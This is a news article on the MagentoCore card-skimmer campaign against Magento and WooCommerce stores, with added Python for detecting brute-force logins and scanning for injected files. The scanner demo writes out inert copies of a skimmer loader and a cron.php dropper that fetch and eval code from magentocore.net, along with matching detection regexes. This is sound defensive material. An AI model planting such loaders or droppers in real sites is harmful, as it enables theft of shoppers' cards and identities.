MagentoCore card skimmer discovered on thousands of e-commerce sites

It has been reported that 7,339 (and counting) individual e-commerce sites have been infected with the MagentoCore card skimmer malware in the last six months, making the malicious script one of the most successful payment card threats out there.

The infections are part of a single effort, all tied back to one well-resourced group with global reach. “Online skimming – your identity and card are stolen while you shop – has been around for a few years, but no campaign has been so prolific as the MagentoCore.net skimmer,” says Willem de Groot, an independent malware hunter.

“The group has turned [thousands] of individual stores into zombie money machines, to the benefit of their illustrious masters.”

De Groot also says he suspects the Magecart group, the same outfit that pulled off the Ticketmaster heist earlier in the year, to be behind it. However, attribution beyond the basics remains murky.

“Their collection server is registered in Moscow, but I couldn’t say anything about their location or nationality, unfortunately,” he says.

The campaign is global and ongoing: According to De Groot’s nightly scans, new stores are being hijacked at the alarming pace of 50 to 60 stores per day.

Further, the script appears to be rather persistent: the average recovery time is “a few weeks”, he said, with at least 1,450 e-commerce sites hosting the MagentoCore parasite for the full six months of his analysis.

“The victim list contains multimillion dollar, publicly traded companies, which suggests the malware operators make a handsome profit. But the real victims are eventually the customers, who have their cards and identities stolen.”

The Magecart actors are targeting online stores running Magento and WordPress with WooCommerce, and “the attack vector is, in almost all recent cases, brute-forcing the administrator password.” He said the adversaries are patient, automatically trying millions of common passwords, often over the course of a few months, until they find one that works.
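Catching the slow brute force de Groot describes means looking beyond a single noisy IP. The following Python is an added example, not code from the article or from de Groot's scanner: it parses constructed web-server access-log lines (combined log format; the addresses and timing are invented) and flags both the classic one-source burst and the distributed, low-rate pattern in which each source stays under the per-IP threshold. The admin path `/index.php/admin`, the thresholds and windows, and the assumption that a failed login re-renders the form with HTTP 200 while a successful one redirects with 302 are all assumptions to adjust for the deployment.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed access-log excerpt in combined log format. Addresses come from the
# documentation ranges and the traffic is invented for this example.
SAMPLE_LOG = """\
203.0.113.10 - - [10/Aug/2018:02:14:01 +0000] "POST /index.php/admin/ HTTP/1.1" 200 5123 "-" "python-requests/2.19"
203.0.113.10 - - [10/Aug/2018:02:14:02 +0000] "POST /index.php/admin/ HTTP/1.1" 200 5123 "-" "python-requests/2.19"
203.0.113.10 - - [10/Aug/2018:02:14:04 +0000] "POST /index.php/admin/ HTTP/1.1" 200 5123 "-" "python-requests/2.19"
203.0.113.10 - - [10/Aug/2018:02:14:05 +0000] "POST /index.php/admin/ HTTP/1.1" 200 5123 "-" "python-requests/2.19"
203.0.113.10 - - [10/Aug/2018:02:14:07 +0000] "POST /index.php/admin/ HTTP/1.1" 200 5123 "-" "python-requests/2.19"
203.0.113.10 - - [10/Aug/2018:02:14:09 +0000] "POST /index.php/admin/ HTTP/1.1" 200 5123 "-" "python-requests/2.19"
198.51.100.7 - - [10/Aug/2018:03:00:10 +0000] "GET /index.php/admin/ HTTP/1.1" 200 4870 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Aug/2018:03:00:31 +0000] "POST /index.php/admin/ HTTP/1.1" 302 0 "-" "Mozilla/5.0"
192.0.2.21 - - [10/Aug/2018:04:10:00 +0000] "POST /index.php/admin/ HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
192.0.2.22 - - [10/Aug/2018:04:22:00 +0000] "POST /index.php/admin/ HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
192.0.2.23 - - [10/Aug/2018:04:35:00 +0000] "POST /index.php/admin/ HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
192.0.2.24 - - [10/Aug/2018:04:48:00 +0000] "POST /index.php/admin/ HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
192.0.2.25 - - [10/Aug/2018:05:01:00 +0000] "POST /index.php/admin/ HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
203.0.113.99 - - [10/Aug/2018:05:02:00 +0000] "POST /checkout/onepage/saveOrder/ HTTP/1.1" 200 310 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"


def failed_admin_logins(log_text, admin_path="/index.php/admin"):
    """Return a time-ordered list of (timestamp, ip) for failed admin logins.

    Assumption: a successful login answers with a 302 redirect to the
    dashboard while a failed one re-renders the form with 200, so POSTs to
    the admin path that do not redirect are counted as failures."""
    events = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m or m["method"] != "POST":
            continue
        if not m["path"].startswith(admin_path) or m["status"] == "302":
            continue
        events.append((datetime.strptime(m["ts"], TS_FMT), m["ip"]))
    events.sort()
    return events


def noisy_sources(events, threshold=5, window=timedelta(minutes=10)):
    """Classic brute force: one IP with >= threshold failures in a sliding
    window. Returns {ip: peak failure count seen inside the window}."""
    recent = defaultdict(deque)
    flagged = {}
    for ts, ip in events:
        q = recent[ip]
        q.append(ts)
        while ts - q[0] > window:      # drop failures older than the window
            q.popleft()
        if len(q) >= threshold:
            flagged[ip] = max(flagged.get(ip, 0), len(q))
    return flagged


def distributed_attempts(events, min_sources=4, window=timedelta(hours=1)):
    """Low-and-slow pattern: failures trickle in from many distinct IPs, each
    below the per-IP threshold. Returns [(window_start, window_end, sources)]
    for every window in which at least min_sources distinct IPs failed."""
    hits = []
    q = deque()
    for ts, ip in events:
        q.append((ts, ip))
        while ts - q[0][0] > window:
            q.popleft()
        sources = {src for _, src in q}
        if len(sources) >= min_sources:
            hits.append((q[0][0], ts, len(sources)))
    return hits


if __name__ == "__main__":
    failures = failed_admin_logins(SAMPLE_LOG)
    print(f"{len(failures)} failed admin logins")
    print("noisy sources:", noisy_sources(failures))
    for start, end, n in distributed_attempts(failures):
        print(f"{n} distinct sources between {start:%H:%M} and {end:%H:%M}")
```

On the sample, the first source trips the per-IP rule with six failures in under a minute, while the five 192.0.2.x addresses never exceed one failure each and are only visible to the distinct-source rule. Because the campaign runs for months, the distinct-source window should be evaluated over the whole retained log, not just the last hour, and the admin path should be moved off the default so that the counts reflect only traffic that knows where the login lives.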

Attackers can also gain access through a staff computer that is infected with malware, or by hijacking an authorised session using a vulnerability in the content management system (CMS).

The skimmer has been around since last December, although less sophisticated versions were found as early as 2015. Once the actors succeed in gaining access to the CMS back end running the website, they embed the MagentoCore JavaScript code in the HTML template.

The code can be hidden in several places, including the default HTML header and footer templates and in minified, static, hidden JavaScript files deep in the codebase. The actors also add a backdoor to cron.php.

“That will periodically download malicious code, and, after running, delete itself, so no traces are left,” de Groot said.
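To find the artefacts just described, a responder wants two things: a search for the skimmer domain across templates and static JavaScript, and a way to notice that cron.php (or anything else) differs from a known-clean copy, since the downloaded payload may be gone by the time anyone looks. The following Python is an added example, not the article's or de Groot's tooling: it hashes a constructed store tree as a baseline, injects the three artefacts the article mentions as inert text, and scans. The directory layout, the placeholder script paths under magentocore.net, and the dropper heuristics (remote fetch plus eval plus unlink(__FILE__)) are assumptions for the example, not published signatures.

```python
import hashlib
import re
import tempfile
from pathlib import Path

# Collection domain named in the article; everything else below is constructed.
SKIMMER_DOMAIN = "magentocore.net"
SCAN_SUFFIXES = {".php", ".phtml", ".html", ".js"}

# Heuristics for the cron.php backdoor the article describes (fetch remote
# code, run it, delete itself). These regexes are assumptions for this
# example, not published signatures; tune them before relying on them.
DROPPER_PATTERNS = {
    "remote-fetch": re.compile(r"(file_get_contents|curl_init|fopen)\s*\(\s*['\"]https?://", re.I),
    "eval": re.compile(r"\beval\s*\(", re.I),
    "self-delete": re.compile(r"unlink\s*\(\s*__FILE__\s*\)", re.I),
}


def sha256_of(path):
    return hashlib.sha256(path.read_bytes()).hexdigest()


def baseline(root):
    """Record hashes of every scannable file; run this on a known-clean deploy."""
    root = Path(root)
    return {p.relative_to(root).as_posix(): sha256_of(p)
            for p in root.rglob("*") if p.is_file() and p.suffix in SCAN_SUFFIXES}


def scan(root, known_hashes=None):
    """Return sorted (relative_path, finding) tuples for the tree under root.
    Without a baseline only the domain search and cron.php heuristic run."""
    root = Path(root)
    findings = []
    for path in root.rglob("*"):
        if not path.is_file() or path.suffix not in SCAN_SUFFIXES:
            continue
        rel = path.relative_to(root).as_posix()
        text = path.read_text(errors="replace")
        if SKIMMER_DOMAIN in text.lower():
            findings.append((rel, "skimmer-domain"))
        if path.name == "cron.php":
            matched = [name for name, rx in DROPPER_PATTERNS.items() if rx.search(text)]
            if len(matched) >= 2:          # require two markers to cut noise
                findings.append((rel, "dropper-heuristic"))
        # A file that is new or whose hash moved since the clean baseline.
        if known_hashes is not None and known_hashes.get(rel) != sha256_of(path):
            findings.append((rel, "changed-since-baseline"))
    return sorted(findings)


def demo():
    """Build a constructed store tree, baseline it, inject the three artefacts
    the article mentions, and scan. The injected strings are inert text."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        files = {  # constructed layout, not a real Magento/WooCommerce tree
            "template/header.phtml": "<!doctype html>\n<head><title>Shop</title></head>\n",
            "template/footer.phtml": "<footer>&copy; Shop</footer>\n",
            "js/lib/app.min.js": "!function(){console.log('app')}();\n",
            "cron.php": "<?php\nrequire __DIR__ . '/app/bootstrap.php';\nrun_scheduled_jobs();\n",
        }
        for rel, body in files.items():
            (root / rel).parent.mkdir(parents=True, exist_ok=True)
            (root / rel).write_text(body)
        clean = baseline(root)

        # Injection 1: script tag in the HTML header template (placeholder path).
        with (root / "template/header.phtml").open("a") as f:
            f.write(f'<script src="https://{SKIMMER_DOMAIN}/example.js"></script>\n')
        # Injection 2: loader appended to a minified static JS file.
        with (root / "js/lib/app.min.js").open("a") as f:
            f.write(f'!function(d){{var s=d.createElement("script");'
                    f's.src="https://{SKIMMER_DOMAIN}/example.js";'
                    f'd.head.appendChild(s)}}(document);\n')
        # Injection 3: dropper in cron.php: fetch, run, remove itself.
        with (root / "cron.php").open("a") as f:
            f.write(f"$c = file_get_contents('https://{SKIMMER_DOMAIN}/example.txt');\n"
                    "eval($c);\nunlink(__FILE__);\n")
        return scan(root, clean)


if __name__ == "__main__":
    for rel, finding in demo():
        print(f"{finding:24} {rel}")
```

Keep the baseline off the web host (an attacker with admin access can rewrite a file the store itself holds) and re-run the hash comparison on a schedule from elsewhere: a changed cron.php is evidence even after the fetched payload has removed itself, which the domain search alone would miss. Real skimmers often encode the domain rather than write it in clear, so the plain-text match is a first pass, not proof of a clean site.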
